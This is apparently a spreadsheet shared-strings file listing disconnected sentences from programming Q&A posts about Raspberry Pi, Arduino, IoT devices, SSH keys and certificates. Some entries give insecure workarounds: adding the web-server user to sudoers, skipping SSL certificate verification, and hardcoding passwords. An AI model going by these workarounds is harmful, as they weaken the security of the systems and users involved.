    <t>Second Function: from the app I get the data a user has typed into 2 boxes, one a text box the other a password box, this is received by the Arduino as one string with comma's as a delimiter so the string can be separated into it's component parts, which in this case are an "ssid name" and a "network key".</t>
  </si>
  <si>
    <t>It keeps returning
Google sheet login failed with error: [Errno 1] _ssl.c:504: error:14090086:SSL routines:SSL3_GET_SERVER_CERTIFICATE:certificate verify failed
I followed many ways and workarounds but nothing seems to fit this error like skip the verification (security isn't matter, at least to me), install a bunch of suggested packages, etc.</t>
  </si>
  <si>
    <t>On a fresh install of Raspbian (Buster), I installed pip3:
Then inside a new directory, install opencv-python (latest version of 3.x in my case):
pipenv install opencv-python==3.4.4.19
Which ends with an error about mismatched hashes:
It looks like piwheels.org index is there, which is good.</t>
  </si>
  <si>
    <t>I'm using this code:
But I get 'invalid conversion' errors.</t>
  </si>
  <si>
    <t>The class keyword only has different default access, public, private, etc.</t>
  </si>
  <si>
    <t>two keys (a public and a private one).</t>
  </si>
  <si>
    <t>Public and private keys generation not needed.</t>
  </si>
  <si>
    <t>My last, and problematic command "2" to remove an ID, is where I'm seeking help with.</t>
  </si>
  <si>
    <t>When I looked at this I saw that I was getting a permission error:
My python code will create or append a file if it already exists.</t>
  </si>
  <si>
    <t>Like an API for some calls that do not concern telemetry or device twin data.</t>
  </si>
  <si>
    <t>The devices I am trying are local devices that do not pass a firewall.</t>
  </si>
  <si>
    <t>It looks like you're missing the TembooAccount.h file that contains your Temboo account info.</t>
  </si>
  <si>
    <t>Install your AppX bundle and certificate without adding any dependencies.</t>
  </si>
  <si>
    <t>By default auto connect parameter is false.</t>
  </si>
  <si>
    <t>You are passing it an invalid pointer.</t>
  </si>
  <si>
    <t>A kernel which does not contain gdb panics on unexpected faults.</t>
  </si>
  <si>
    <t>The keystore file is a key database file that contains both public keys and private keys.</t>
  </si>
  <si>
    <t>My header file looks something like this:
My .cpp file looks like this:
I would like SoftwareSerial to be a private field in MyLibrary (preferably static but not necessary) but I've tried many was of declaring it but nothing seems to work.</t>
  </si>
  <si>
    <t>The trouble is, smtplib sends out the password for the script in plain text and I am skeptical about its security.</t>
  </si>
  <si>
    <t>Further my script contains my username and password in plain text.</t>
  </si>
  <si>
    <t>Can anyone help me connect to a wifi called test1 whose password is passwordtest1?</t>
  </si>
  <si>
    <t>What command or commands are being run behind the scenes when arduino verifies code?</t>
  </si>
  <si>
    <t>string wsUN = project.loginData.Default.username;
string wsPW = project.loginData.Default.password;
string wsIP = project.loginData.Default.ipString;
string projectConnect = "datasource=" + wsIP + ";port=3306;username=" + wsUN + ";password=" + wsPW;
I am completely clueless.</t>
  </si>
  <si>
    <t>I'm trying to allow my Pi to connect to a public Wifi network with no password, but I can't seem to get the wpa_supplicant.conf file right.</t>
  </si>
  <si>
    <t>So get parsed correctly than parsed only user, but not user=password.</t>
  </si>
  <si>
    <t>";
            return true;
        }
        std::cout &lt;&lt; "Connection not Acknowledged.</t>
  </si>
  <si>
    <t>Checking if the location isValid() always returns not to be true.</t>
  </si>
  <si>
    <t>Forcing the value serialPort.IsRequestToSendEnabled to true causes an Exception of invalid value.</t>
  </si>
  <si>
    <t>I have imported the WSO2 IoT server Connected Cup sample device agent into Eclipse IDE, and when it tries to connect  to MQTT broker a MQTTSecurityException is thrown which states that the user name or password in not valid.</t>
  </si>
  <si>
    <t>For the ARM validation, I can not run the IoT package on my local computer but I have to run it on my IoT device - a Raspberry 3 Windows 10 IoT (10.0.15063.297).</t>
  </si>
  <si>
    <t>I inserted test lines into my code, so I know that I can scan and discover the device, but I don't know how to store it somewhere that I can connect to it.</t>
  </si>
  <si>
    <t>I don't have a security system or so that can be controlled with fhem, so it's not that bad when somebody "hacks" my fhem by knowing the address and commands.</t>
  </si>
  <si>
    <t>(developer error)", e);
        } catch (InvalidKeySpecException e) {
            throw new IllegalStateException("Invalid Key spec.</t>
  </si>
  <si>
    <t>When I run the last AT Command to establish a TCP connection with my local server, I get an error.</t>
  </si>
  <si>
    <t>But then, when the code gets to the JSON.parse() call, i get SyntaxError: Unexpected token  in JSON at position 26.</t>
  </si>
  <si>
    <t>I've bought a ESP8266 and installed micropython but when i try to connect to my wifi with sta_if.connect("AP_name", "password") and test it, its always false.</t>
  </si>
  <si>
    <t>I also tried enabling the secure TCP with the command AT+CIPSSL=1, but this one also returns an error.</t>
  </si>
  <si>
    <t>certutil -d sql:$HOME/.pki/nssdb -A -t "C,," -n certificate nickname -i certificate path/filename
I could also able to list the certificate from the nssdb and also could see the details.</t>
  </si>
  <si>
    <t>Aug 20 20:38:22 reliagate-10-12 iotedged[3466]: 2019-08-20T20:38:22Z [INFO] - Obtaining workload CA succeeded.</t>
  </si>
  <si>
    <t>To be fair the mallocs where from data that was within the file referenced by the ExtAudioOpenFile method, not disposing the file reference left a leak.</t>
  </si>
  <si>
    <t>transmission-remote --auth myusername:mypassword -l
this worked for me... just all in one line... log in plus your command...</t>
  </si>
  <si>
    <t>it's not pretty and not secure but it might work on you local home-network.</t>
  </si>
  <si>
    <t>While running command via ssh you  executing it as user pi(probably), but via shell_exec  you execute command as user www-data which do not have necessary permissions.</t>
  </si>
  <si>
    <t xml:space="preserve"> will remove the files directory and all subdirectories and not prompt you with questions about file permissions.</t>
  </si>
  <si>
    <t>192.168.42.159...
Network setup
 This part has to be done by your self using your SSH and local network config.</t>
  </si>
  <si>
    <t>This always happens if the pairing info is not stored on the device.</t>
  </si>
  <si>
    <t>Isn't the default password the empty string ?</t>
  </si>
  <si>
    <t>After I upgraded to Stretch I cut berryconda from my path, pip uninstalled cryptography, twisted, pyopenssl, and scrapy.</t>
  </si>
  <si>
    <t>Then I was able to register the file from an administrative command prompt.</t>
  </si>
  <si>
    <t>To enable persistence, call the enablePersistence method.</t>
  </si>
  <si>
    <t>You should not try to connect to IoT Hub using the identity of one of the system modules because it would conflict with the system modules.</t>
  </si>
  <si>
    <t>Tokenizing is the act of splitting a string into discrete elements called tokens.</t>
  </si>
  <si>
    <t>Bitcoind is a program that implements the Bitcoin protocol for command line and remote procedure call (RPC) use.</t>
  </si>
  <si>
    <t>A command line interface for bootstrapping and managing Asch blockchain apps.</t>
  </si>
  <si>
    <t>A user agent is a piece of software (a software agent) that acts on behalf of a user.</t>
  </si>
  <si>
    <t>Arrays, hashes, numbers, strings and booleans can be stored by using JSON.stringify(value).</t>
  </si>
  <si>
    <t>Once such a key is discarded it can never be recreated, so it is impossible to do a lookup of that key in a WeakHashMap at some later time and be surprised that its entry has been removed.</t>
  </si>
  <si>
    <t>This means the compiler can determine if method calls are valid, before a program is run by an end user.</t>
  </si>
  <si>
    <t>The private key is stored on the local machine.</t>
  </si>
  <si>
    <t>By concept, the mask serves for removal of permissions (000 - nothing is removed, 777 - all removed).</t>
  </si>
  <si>
    <t>H.323, Media Gateway Control Protocol (MGCP) or Session Initiation Protocol (SIP) is used to pass call signaling to gateways.</t>
  </si>
  <si>
    <t>Change the button route to /authentication/authenticate/facebook  &lt;-- notice we've removed the fake prepended text?</t>
  </si>
  <si>
    <t>Entry methods:
In Unicode Sign Euro  is encoded at U+20AC.</t>
  </si>
  <si>
    <t>Spring Security (formerly known as Acegi Security) is the Spring Framework's application security solution.</t>
  </si>
  <si>
    <t>Often UML is also used to install a so-called "honeypot", with the security of a computer or network can be tested.</t>
  </si>
  <si>
    <t>The constructor expects a valid ws:// URI to connect to.</t>
  </si>
  <si>
    <t>The Kayyali operator for edge detection is another operator generated from Sobel operator.</t>
  </si>
  <si>
    <t>This for example
  allows runtime validation of method arguments.</t>
  </si>
  <si>
    <t>Local Security Authority is a protected subsystem in Microsoft Windows which authenticates users on the local system.</t>
  </si>
  <si>
    <t>It also maintains information about local security, also known as the Local Security Policy.</t>
  </si>
  <si>
    <t>The chosen alias will be returned by the callback alias(String), or null if no private key is available or the user cancels the request.</t>
  </si>
  <si>
    <t>This module should be combined with at least one authentication module such as mod_authn_file and one authorization module such as mod_authz_user.</t>
  </si>
  <si>
    <t>If more than one certificate or public key is acceptable, then the program holds a pinset.</t>
  </si>
  <si>
    <t>With a one-line install and a private key, you are up and ready to go.</t>
  </si>
  <si>
    <t>Spring Security is one of the most mature and widely used Spring projects.</t>
  </si>
  <si>
    <t>Arrays, hashes, numbers, strings and booleans can be stored by using .</t>
  </si>
  <si>
    <t>As of April 14, 2015 npm also supports private modules that can be defined and used only by users who you specify.</t>
  </si>
  <si>
    <t>And this code can generates certificates like as these:
-----BEGIN PUBLIC KEY-----
MIIBCgKCAQEA0FGWENPInhIfCLDTqCFKFsyrvmzKsEjJtHEL0Tqh0LtHDWG5Sh7M
T7/x/xNAFc00zmgGG+PPaJDP/7gkGJitRAXcJOlKwlowgmVTf+QGwH81pq3oZNRd
0mEXbF0EuPBRNt/9TzkZPAlPDGruMCiMq9LWsoIflx+u/3UmXgsyMQTs5vSMz4T5
VCELHGCtfZfBrDAP19KzwjFEUTEzX+Llotp0mO6+cRCslVvSK3xd8KIk2cOmAXEm
CavZnwuVsqCVmNZFoQZvFszisMf5cXZRDstKCGsqDgqIGM5dMMrBS92CqZ4uj6h9
zbMG7J9oXsVmVFiQ++hS0TLJdWwMD+uhWQIDAQAB
-----END PUBLIC KEY-----</t>
  </si>
  <si>
    <t>If eth0: is found in line, inet_line is defined, otherwise it will not be defined and Python jumps to the next code block which is where the exception is raised.</t>
  </si>
  <si>
    <t>Oh okay figured it out
had to add the PHP user to the sudoers
the php user is called www-data
I got the username from doing this:
Thanks all</t>
  </si>
  <si>
    <t>This class provides methods for registration of functions that can be called by the XML-RPC protocol.</t>
  </si>
  <si>
    <t>Neither a key nor the object paired with it can be nil, however, you may use NSNull for storing null objects.</t>
  </si>
  <si>
    <t>I found that the "XPC connection invalid" message is printed 0.004 seconds after initializing the CBCentralManager object.</t>
  </si>
  <si>
    <t>Following is my device twin payload, By mistake I have added "someKey" property to it.</t>
  </si>
  <si>
    <t>I made a function to verify that the value entered is equal to the pass.</t>
  </si>
  <si>
    <t>use stunnel at both ends, so all traffic at both ends goes to localhost that stunnel encrypts and sends to the other end</t>
  </si>
  <si>
    <t>This command can open certain security holes in your user script, and it is recommended to use this command sparingly.</t>
  </si>
  <si>
    <t>$.ajax({
        type: "GET",
        dataType: "jsonp",
        cache: false,
        url: "https://api.instagram.com/v1/users/[UserID]/media/recent/?access_token=[CODE]",
        success: function(data) {...}
    });
});
The userID used here is your ID and not the login name.</t>
  </si>
  <si>
    <t>Have tried both Linux and Windows 10 and always end up with the Edge Agent reporting "Agent Configuration format is Invalid" when we try and push the tempSensor container from the walk-through to the device.</t>
  </si>
  <si>
    <t>-fstack-protector-strong -Wformat -Werror=format-security  ',
 'PY_CORE_CFLAGS': '-fno-strict-aliasing -DNDEBUG -g -fwrapv -O2 -Wall -Wstrict-prototypes -Wdate-time -D_FORTIFY_SOURCE=2 -g -fdebug-prefix-map=/build/python2.7-9xgeTe/python2.7-2.7.13=.</t>
  </si>
  <si>
    <t>In general, access restriction directives apply to all access methods (GET, PUT, POST, etc).</t>
  </si>
  <si>
    <t>A stackframe is a list of functions that have been invoked but have not yet returned a value
References
How can a program survive a corrupted stack?</t>
  </si>
  <si>
    <t>To install RedLock.net, run the following command in the Package Manager Console.</t>
  </si>
  <si>
    <t>For those interested,
auto login:
instead of
in /etc/inittab
and 
sh /home/pi/apache-tomcat-7.0.47/bin/startup.sh
su -l pi -c startx
exit 0
in /etc/rc.local
Now, I'd like to launch a java program (jar file) that I made, automatically after server X has started.</t>
  </si>
  <si>
    <t>Use it to create public, private, and password-protected slideshow presentations using the tools you already know and love ~ Markdown + Git.</t>
  </si>
  <si>
    <t>The next thing to do is make sure I can pair the devices with the PIN 0000 which is the main reason I created this question.</t>
  </si>
  <si>
    <t>LoraWAN specifies facilities for end-to-end
encryption of packets, device addressing, replay attack protection,
congestion management, channel hopping, application provisioning,
etc.</t>
  </si>
  <si>
    <t>Per the excellent support at Twilio, the one line that needs to be added is 
There is a newline character at the end of the base64 encoded login and this needs to be stripped out.</t>
  </si>
  <si>
    <t>Test Condition: An item or event of a component or system that could be verified by one or more test cases.</t>
  </si>
  <si>
    <t>Most packages take advantage of the functions that a Chocolatey PowerShell module provides that make downloading and silently installing an application no more than a function call.</t>
  </si>
  <si>
    <t>This is achieved by creating subclasses at run time where method invocations are intercepted by user defined methods.</t>
  </si>
  <si>
    <t>When I run my python file it comes up with:
Code is as follows:
import sys
import datetime
from twython import Twython
#Twitter keys
CONSUMER_KEY="xxx"
CONSUMER_SECRET ="xxx"
ACCESS_KEY = "xxx"
ACCESS_SECRET ="xxx"
api = Twython(CONSUMER_KEY,CONSUMER_SECRET,ACCESS_KEY,ACCESS_SECRET)
dt=datetime.datetime.now()
mon=4-dt.month
day=18-dt.day
hr=23-dt.hour
mn=60-dt.minute
sec=60-dt.second
pythonTest("Hi, I'm using my raspberry pi and python to tweet status     updates.")</t>
  </si>
  <si>
    <t>Here's a quick example that takes a username and api key as cmd line arguments and fetches what is currently playing for that user using the requests library.</t>
  </si>
  <si>
    <t>See:
http://modwsgi.readthedocs.io/en/develop/user-guides/application-issues.html#access-rights-of-apache-user
Although it doesn't look like it is the case here, but another common problem is where you use a relative path name rather than absolute.</t>
  </si>
  <si>
    <t>In addition, an anonymous method can refer to variables and bind values to the variables in the context in which the method is defined.</t>
  </si>
  <si>
    <t>FInally, when finishing the login sometimes it returns to the previous activity (my app), and something the login activity is started again...</t>
  </si>
  <si>
    <t>All I need to be able to send is , 'device=0,1,2', 'time=(secondsasinteger)' and 'pass=thepassword' I can send this as URL variables, or a POST to my existing power.py linked above, and it does it.</t>
  </si>
  <si>
    <t>Since you can add multiple IP addresses to the interface  as noted above, I believe the solution to your problem is to remove the auto eth0 line from your /etc/network/interfaces file.</t>
  </si>
  <si>
    <t>Public-key Cryptography Standard #10 specifies format of messages sent to a certification authority to request certification of a public key.</t>
  </si>
  <si>
    <t>If I want to enable a encryption method for the sensors passing data through WiFi shield connecting to simulator running in pc/laptop , any best practices to be followed?</t>
  </si>
  <si>
    <t>Asuming that you have a user that has permissions to call ntpdate ( in other words, who can adjust the system's time), you could use the following script, I am using in the eample the ntp server "0.ca.pool.ntp.org"
Note that you might need to install the package 'ntpdate' for this to work.</t>
  </si>
  <si>
    <t>add public key to ssh user on pi  and verify that you can login without password
Use SSH tunnel in oyur client to create a local port that tunnels to the remote game server port.</t>
  </si>
  <si>
    <t>UPDATE:
The following are steps for using an IoT Central access token for handling a device twins and device direct method within the azure function.</t>
  </si>
  <si>
    <t>Modifying the Shell.java example included in the JSch package, I've successfully installed JSch, connected to my Pi, and even commented out the user/domain/password/host key checking prompt boxes in favor of storing these values directly in my Java code.</t>
  </si>
  <si>
    <t>Solution: I thought of appending the command byte as first byte in Linux response to check/verify in Windows application (that whether the response is for current command or not) and ignore if invalid.</t>
  </si>
  <si>
    <t>Zend Guard transforms the plain text by using obfuscation techniques and then pre-compiles the PHP, thus bypassing the need to compile it first and securing the code from being reverse engineered easily.</t>
  </si>
  <si>
    <t>Notable Features
CPU Profiling - call-tree and call-graph views, hotspots detection
Instrumentation - all calls are profiled, code is instrumented
Sampling - sampling interval of e.g.</t>
  </si>
  <si>
    <t>Since there was and remains no algorithmic method of finding the highest level at which a domain may be registered for a particular top-level domain (the policies differ with each registry), the only method is to create a list.</t>
  </si>
  <si>
    <t>Related excerpt:
If you are found to have posted your code publicly, or asked for help in
  public locations, or copied code from public locations without properly
  attributing it, or tried to cheat or fake challenge results in any way,
  you will be removed from the challenge instantly.</t>
  </si>
  <si>
    <t>Use this tag if you suspect issue with one of the main capabilities of this library
Support OAuth 1.0A  
Use Authorisation headers instead of query string or POST parameters  
Allow uploading of images  
Provide enough information to assist with debugging
Github home</t>
  </si>
  <si>
    <t>I tried connecting through wifi by adding lines of user and password in wpa-supplicant file.</t>
  </si>
  <si>
    <t>I would extract the gateway IP (should be your AndroidPhone) from the network info.</t>
  </si>
  <si>
    <t>so for passing username and password, we should use PLAIN sasl.</t>
  </si>
  <si>
    <t>The webcam must not be erroneously armed when I'm home, nor must it be erroneously disarmed when I'm away from home.</t>
  </si>
  <si>
    <t>I need encrypt data with RSA using public key and decrypt using private key.</t>
  </si>
  <si>
    <t>I have set up my registry and device in Console, and added the public key.</t>
  </si>
  <si>
    <t>Do I need to add a public key to the registry or just to the devices.</t>
  </si>
  <si>
    <t>Using an existing private key, the device can sign a JWT and authenticate itself to Google IoT.</t>
  </si>
  <si>
    <t>However, if I replace  with espClient.setCACert(ROOTCERT); where ROOTCERT is defined as such:
#define ROOTCERT "-----BEGIN CERTIFICATE-----\n" \
"MIIDSjCCAjKgAwIBAgIQRK+wgNajJ7qJMDmGLvhAazANBgkqhkiG9w0BAQUFADA/\n" \
"MSQwIgYDVQQKExtEaWdpdGFsIFNpZ25hdHVyZSBUcnVzdCBDby4xFzAVBgNVBAMT\n" \
"DkRTVCBSb290IENBIFgzMB4XDTAwMDkzMDIxMTIxOVoXDTIxMDkzMDE0MDExNVow\n" \
"PzEkMCIGA1UEChMbRGlnaXRhbCBTaWduYXR1cmUgVHJ1c3QgQ28uMRcwFQYDVQQD\n" \
"Ew5EU1QgUm9vdCBDQSBYMzCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEB\n" \
"AN+v6ZdQCINXtMxiZfaQguzH0yxrMMpb7NnDfcdAwRgUi+DoM3ZJKuM/IUmTrE4O\n" \
"rz5Iy2Xu/NMhD2XSKtkyj4zl93ewEnu1lcCJo6m67XMuegwGMoOifooUMM0RoOEq\n" \
"OLl5CjH9UL2AZd+3UWODyOKIYepLYYHsUmu5ouJLGiifSKOeDNoJjj4XLh7dIN9b\n" \
"xiqKqy69cK3FCxolkHRyxXtqqzTWMIn/5WgTe1QLyNau7Fqckh49ZLOMxt+/yUFw\n" \
"7BZy1SbsOFU5Q9D8/RhcQPGX69Wam40dutolucbY38EVAjqr2m7xPi71XAicPNaD\n" \
"aeQQmxkqtilX4+U9m5/wAl0CAwEAAaNCMEAwDwYDVR0TAQH/BAUwAwEB/zAOBgNV\n" \
"HQ8BAf8EBAMCAQYwHQYDVR0OBBYEFMSnsaR7LHH62+FLkHX/xBVghYkQMA0GCSqG\n" \
"SIb3DQEBBQUAA4IBAQCjGiybFwBcqR7uKGY3Or+Dxz9LwwmglSBd49lZRNI+DT69\n" \
"ikugdB/OEIKcdBodfpga3csTS7MgROSR6cz8faXbauX+5v3gTt23ADq1cEmv8uXr\n" \
"AvHRAosZy5Q6XkjEGB5YGV8eAlrwDPGxrancWYaLbumR9YbK+rlmM6pZW87ipxZz\n" \
"R8srzJmwN0jP41ZL9c8PDHIyh8bwRLtTcm1D9SZImlJnt1ir/md2cXjbDaJWFBM5\n" \
"JDGFoqgCWjBH4d1QB7wCCZAA62RjYJsWvIjJEubSfZGL+T0yjWW06XyxV3bqxbYo\n" \
"Ob8VZRzI9neWagqNdwvYkQsEjgfbKbYK7p2CNTUQ\n" \
"-----END CERTIFICATE-----\n" 
The code works.</t>
  </si>
  <si>
    <t>In one of them it says that you have to put a file (can be empty) with name ssh in the boot partition.</t>
  </si>
  <si>
    <t>You can enumerate external USB device, first you need add this permission in Package.appxmanifest file.</t>
  </si>
  <si>
    <t>Second: Even if you generate a pair of colliding public keys, so what?</t>
  </si>
  <si>
    <t>If you then want to send the blynk_token to your local server you will have to put only that varialbe in your JSONmessageBuffer.</t>
  </si>
  <si>
    <t>The ValidatePattern attribute specifies a regex pattern for possible values for a cmdlet parameter argument.</t>
  </si>
  <si>
    <t>If there is a security manager, its checkRead method is called with the name argument as its argument to see if read access to the file is allowed.</t>
  </si>
  <si>
    <t>For any query that takes a uid, you can pass me() to return the logged-in user.</t>
  </si>
  <si>
    <t>There are so many patents that most serious endeavors probably involve infringement one or more patents.</t>
  </si>
  <si>
    <t>I am getting invalid/incomplete strings from the bluetooth .</t>
  </si>
  <si>
    <t>What I am trying to accomplish is to set two passwords namely pass1 and pass 2.</t>
  </si>
  <si>
    <t>I'm a bit confused as to how the JSON generated by the Parse API could become invalid after a while.</t>
  </si>
  <si>
    <t>Details:0", Uri:""
It jumps right to my catch block when axecuting AuthorizeAsync() method.</t>
  </si>
  <si>
    <t>* Trust url parameter is set.</t>
  </si>
  <si>
    <t>I want to communicate to pass "yes\n" to this prompt as well as the password afterwards.</t>
  </si>
  <si>
    <t>device.name = "Itead_PN532_SPI"
device.connstring = "pn532_i2c:/dev/i2c-1"
I have tried to set the parameter allow_intrusive_scan to true, but it do not change anything.</t>
  </si>
  <si>
    <t>As you can see I already allowed for self signed certificates by calling the appropriate API method of BearSSL.</t>
  </si>
  <si>
    <t>I think your Public/Private Keys for Authentication is not configured correctly in your server.</t>
  </si>
  <si>
    <t>Actually this sites is the final case I am referencing for my hello codes now.</t>
  </si>
  <si>
    <t>For that, you need web server (virtualized or not) which has public IP address (static preferably).</t>
  </si>
  <si>
    <t>In Node-Red in connection parameters you need to use server login.</t>
  </si>
  <si>
    <t>If you run Login.java you enter the program in the main method.</t>
  </si>
  <si>
    <t>The Raspberry PI is assumed to be internal itself without a public IP or any way to be addressed beyond the local network.</t>
  </si>
  <si>
    <t>A Java ParseException gets raised whenever a ParseObject issues an invalid request.</t>
  </si>
  <si>
    <t>Security test web applications by modifying POST parameters.</t>
  </si>
  <si>
    <t>tokenize when the format is used to splitting input in smaler tokens</t>
  </si>
  <si>
    <t>Blobs are URI-accessible, and may be configured as private or public.</t>
  </si>
  <si>
    <t>The program below uses a keypad and arduino to test whether an input is equal to the password.</t>
  </si>
  <si>
    <t>The above comment indicates that upon invocation of an interrupt handler, the interrupt line for that interrupt is masked.</t>
  </si>
  <si>
    <t>But if I run it from the command prompt, it acts like it doesn't see the config file, and asks me for my Email and Password.</t>
  </si>
  <si>
    <t>token"
So there was an error, but it was not thrown when the attach method was called from a class
Thanks very much</t>
  </si>
  <si>
    <t>I replaced the sensor by fake values, so you don't need to add any hardware.</t>
  </si>
  <si>
    <t>What is the simplest path toward automating a WiFi login from an Arduino Yun (Yn) to a "Captive Portal" authenticated login method.</t>
  </si>
  <si>
    <t>However, I don't want to leave my Pi sitting around with a script that has my username and password in plain text.</t>
  </si>
  <si>
    <t>I'm using the same arguments and filename in my callback version that works just fine (which seems to rule out a file permission issue).</t>
  </si>
  <si>
    <t>If I Ctrl+C to get to a prompt I get root access but the directories are listing nothing when I use the 'ls' command.</t>
  </si>
  <si>
    <t>Need to enter the
required info in Package.pkg.xml file.</t>
  </si>
  <si>
    <t>On my Raspberry Pi running raspbian jessie I tried to go through the OAuth2 flow to connect a program to my dropbox using the dropbox SDK for Python which I installed via pip.</t>
  </si>
  <si>
    <t>What I've done: 
in /etc/rc.local:
the pi boots normally and after i login using SSH and write:
i get:
...
root   2357   1.4   1.9   10556   8836 ?</t>
  </si>
  <si>
    <t>However, when I run the command sudo bluez-simple-agent hci0 68:96:7B:4F:FE:82 (this is supposed to pair to my phone) I am prompted for a passkey.</t>
  </si>
  <si>
    <t>The problem here is that my phone is never prompted for a pairing request thus I never see the passkey.</t>
  </si>
  <si>
    <t>But what is the reason that your card returns an Authentication Error or an Integrity Error or an unexpected CMAC?</t>
  </si>
  <si>
    <t>I am just calling  WiFi.begin(Ssid, Password); to connect to wifi without doing any changes with wifi.conf().</t>
  </si>
  <si>
    <t>I am receiving an IO Error: [Errno 22]Invalid argument when I run the code below:
Would someone please explain why this might be happening?</t>
  </si>
  <si>
    <t>Sample Data into DB file (local.db)
How to prevent this automatic multiple entry?</t>
  </si>
  <si>
    <t>But, whenever I run any variation of the dub command, it returns Illegal instruction and nothing else.</t>
  </si>
  <si>
    <t>Note: App Private Networks (Client &amp; Server) under Capabilities in the Package.appxmanifest is enabled.</t>
  </si>
  <si>
    <t>To do a facebook login i first need to configure my application on facebook and there i can't set an IP as site URL(facebook don't allow), i must to put a DNS.</t>
  </si>
  <si>
    <t>Tests based only on open and verify commands works.</t>
  </si>
  <si>
    <t>I have the command:
the  is dangerous, so I want to avoid it and use shell=False.</t>
  </si>
  <si>
    <t>I had trouble with $dbconnect = mysql_pconnect($server, $dbusername, $dbpassword); and hence replaced that with $db = new PDO('mysql:host=localhost;dbname=test;charset=utf8mb4', 'arduino', 'test'); 
I also had trouble with mysql_query($sql);.</t>
  </si>
  <si>
    <t>I tried to disable ro.secure by unpacking and repacking boot.img, however flashed system still returns getprop ro.secure 0.</t>
  </si>
  <si>
    <t>Screenly doesn't have a way to get past this, other than passing the login information and the page redirect through the URL itself.</t>
  </si>
  <si>
    <t>Therefore is here my code of the 000-default.conf and default-ssl.conf file.</t>
  </si>
  <si>
    <t>According to https://doc.qt.io/qt-5/qtouchdevice.html, my touch device should have been registered somehow by the private QWindowSystemInterface::registerTouchDevice() method, but wasn't.</t>
  </si>
  <si>
    <t>I soon wanted to go back to the main desktop because i had enough of the games.I went on retropie-setup and selected boot to GUI (auto-login).</t>
  </si>
  <si>
    <t>The process seems to hang after the SAS token is received and the call to the CloudBlockBlob constructor is made.</t>
  </si>
  <si>
    <t>I can connect to the Raspberry Pi using ssh on the command line without problems (not password based).</t>
  </si>
  <si>
    <t>(Local network static ip-s)
Raspberry mounts rootfs successfully and I can access it over ssh.</t>
  </si>
  <si>
    <t>The ESP32 has a struct that holds all of the wifi config details, two of which are the SSID and password.</t>
  </si>
  <si>
    <t>I used httpUpdateSigned example from esp8266httpUpdate and the only I changed is calling update method with fingerprint but they didn't work for me.</t>
  </si>
  <si>
    <t>I have tried out ecryptfs-utils package to successfully encrypt my home folder.</t>
  </si>
  <si>
    <t>Also, you methods and members are marked as private by default.</t>
  </si>
  <si>
    <t>All cookies would have to be equal (this is an opaque data representation, btw).</t>
  </si>
  <si>
    <t>Again, the public
  keys look something like this:
You just append them to your authorized_keys file:
$ cat /tmp/id_rsa.john.pub &gt;&gt; ~/.ssh/authorized_keys
$ cat /tmp/id_rsa.josie.pub &gt;&gt; ~/.ssh/authorized_keys
$ cat /tmp/id_rsa.jessica.pub &gt;&gt; ~/.ssh/authorized_keys</t>
  </si>
  <si>
    <t>Plink (PuTTY Link) is a command-line connection tool similar to UNIX
  ssh.</t>
  </si>
  <si>
    <t>Now you should be able to access your webcam under
(your Pi probably has another IP)
I'm going to test it and leave a comment with the right way if I was successful.</t>
  </si>
  <si>
    <t>Do you have a default-ssl.conf file in [wherever-it-is]/mods-available/default-ssl.conf
sudo nano it into existence if not,
restarting the server, have you tried "sudo service apache2 restart" or replace "restart" with "reload"?</t>
  </si>
  <si>
    <t>Your web server should then make a call to SSH to execute the command for you.</t>
  </si>
  <si>
    <t>You can specify path to configuration file on command line however it's better to not execute gammu as root and configure the device to be accessible by user.</t>
  </si>
  <si>
    <t>Whenever calling malloc() or new, you should check the validity of the returned pointer first before using it as well.</t>
  </si>
  <si>
    <t>Then don't enable the HDMI output, don't have a graphical desktop installed and disable the login prompt.</t>
  </si>
  <si>
    <t>You can find the line that calls client-&gt;setFingerprint() in the example at the link above; that's where you'd use server fingerprint.</t>
  </si>
  <si>
    <t>if (BITMASK_DICTIONARY.Keys.Contains(character))
        {
            return BITMASK_DICTIONARY[character];
        }
        // If not, return default.</t>
  </si>
  <si>
    <t>Basically, you just need to include these lines:
All X10 devices have two identifying attributes: a house code and unit code.</t>
  </si>
  <si>
    <t>The nShield product line is a range of hardware security modules produced by nCipher (formerly Thales e-Security).</t>
  </si>
  <si>
    <t>Spring security can be used to secure URLs and method invocations.</t>
  </si>
  <si>
    <t>Go implementation of command line tools for Ethereum blockchain</t>
  </si>
  <si>
    <t>Package private is the default access-control modifier in Java.</t>
  </si>
  <si>
    <t>It is used, among others, in the GNU Virtual Private Ethernet and rxvt-unicode packages, and in the Deliantra MORPG Server and Client.</t>
  </si>
  <si>
    <t>See also:
MSDN: Isolating Unit Test Methods with Microsoft Fakes
Questions tagged with 'moles'</t>
  </si>
  <si>
    <t>Local file security rules are enforced, and security warnings are raised as needed.</t>
  </si>
  <si>
    <t>Mock objects record their calls, then you verify the methods you want.</t>
  </si>
  <si>
    <t>This package is intended to be combined with the ROAuth package as as of
March 2013 the Twitter API requires the use of OAuth authentication.</t>
  </si>
  <si>
    <t>: a JFrame or JDialog) the API offers a default dialog called JXLoginDialog and a default frame called JXLoginFrame.</t>
  </si>
  <si>
    <t>You can perform certain operations with the private key by calling the appropriate API.</t>
  </si>
  <si>
    <t>After calling this method, the given route will not
 be proxied anymore.</t>
  </si>
  <si>
    <t>However, in order to intercept this, you must extend the class and override the method.</t>
  </si>
  <si>
    <t>.validate() should be called once within DOM ready to initialize the plugin.</t>
  </si>
  <si>
    <t>in the lib.rs file), for example for a custom attribute:
#[proc_macro_attribute]
pub fn fact_inner(args: TokenStream, input: TokenStream) -&gt; TokenStream {
    /// ...
}
Every procedural macro returns a TokenStream being the generated code.</t>
  </si>
  <si>
    <t>SSH only verifies whether the same person offering the public key also owns the matching private key.</t>
  </si>
  <si>
    <t>Action listener is registered with one or more GUI components by calling the component  method.</t>
  </si>
  <si>
    <t>It's almost as if, if the function is taking a bit longer to finish that the return value is being corrupted some how.</t>
  </si>
  <si>
    <t>iOS devices support only -certified Bluetooth 2.1 modules (and i can't find any) or BLE modules.</t>
  </si>
  <si>
    <t>But after creating my CA, I try to upload it to AWS IOT I get this error:
Command:
Error:
An error occurred (CertificateValidationException) when calling the RegisterCACertificate operation: CA certificate is not valid.</t>
  </si>
  <si>
    <t>Tokenizing is a common technique in parsing  however, the implementation is usually a little bit different.</t>
  </si>
  <si>
    <t>That certificate is passed to the module via the filesystem and an environment variable establishing the path to the file.</t>
  </si>
  <si>
    <t>For accessing from the MainActivity: The change from private to public of those variables is not the best solution.</t>
  </si>
  <si>
